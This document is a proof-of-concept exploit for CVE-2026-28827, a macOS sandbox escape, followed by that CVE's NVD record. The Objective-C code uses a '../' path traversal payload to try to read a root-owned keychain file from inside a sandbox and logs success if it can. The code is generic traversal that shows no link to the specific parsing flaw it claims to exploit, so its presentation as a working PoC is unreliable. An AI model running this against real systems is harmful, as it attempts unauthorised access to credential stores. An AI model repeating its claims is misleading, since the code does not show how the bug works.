CVE-2026-28827

/* * PoC for CVE-2026-28827: macOS Sandbox Escape via Directory Path Parsing * Description: This code attempts to access a restricted file outside the sandbox * by exploiting the path validation logic. */ #import <Foundation/Foundation.h> int main(int argc, const char * argv[]) { @autoreleasepool { // Constructing a path that may bypass validation due to parsing issues NSString *bypassPayload = @"./../../../../../../../../private/var/root/System.keychain"; NSFileManager *fileManager = [NSFileManager defaultManager]; NSLog(@"Attempting to read restricted file using payload: %@", bypassPayload); if ([fileManager fileExistsAtPath:bypassPayload]) { NSLog(@"[+] Sandbox Escape Successful! File exists."); NSData *data = [NSData dataWithContentsOfFile:bypassPayload]; NSLog(@"[+] Data read: %lu bytes", (unsigned long)data.length); } else { NSLog(@"[-] Exploit failed or path does not exist."); } } return 0; }

{"cve": {"id": "CVE-2026-28827", "sourceIdentifier": "[email protected]", "published": "2026-03-25T01:17:07.890", "lastModified": "2026-03-26T16:48:30.707", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A parsing issue in the handling of directory paths was addressed with improved path validation. This issue is fixed in macOS Sequoia 15.7.5, macOS Sonoma 14.8.5, macOS Tahoe 26.4. An app may be able to break out of its sandbox."}, {"lang": "es", "value": "Se abordó un problema de análisis en el manejo de rutas de directorio con una validación de rutas mejorada. Este problema se corrigió en macOS Sequoia 15.7.5, macOS Sonoma 14.8.5, macOS Tahoe 26.4. Una aplicación podría escapar de su sandbox."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 6.0}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*", "versionStartIncluding": "14.0", "versionEndExcluding": "14.8.5", "matchCriteriaId": "D66288AF-23BD-407A-81F5-F1DFBF84C622"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*", "versionStartIncluding": "15.0", "versionEndExcluding": "15.7.5", "matchCriteriaId": "DD21D2C9-BBEC-4E8E-B8D2-C92B7E6155E1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*", "versionStartIncluding": "26.0", "versionEndExcluding": "26.4", "matchCriteriaId": "6CF848CD-25D4-4371-BEF3-1ACCE47AD81F"}]}]}], "references": [{"url": "https://support.apple.com/en-us/126794", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/126795", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/126796", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}]}}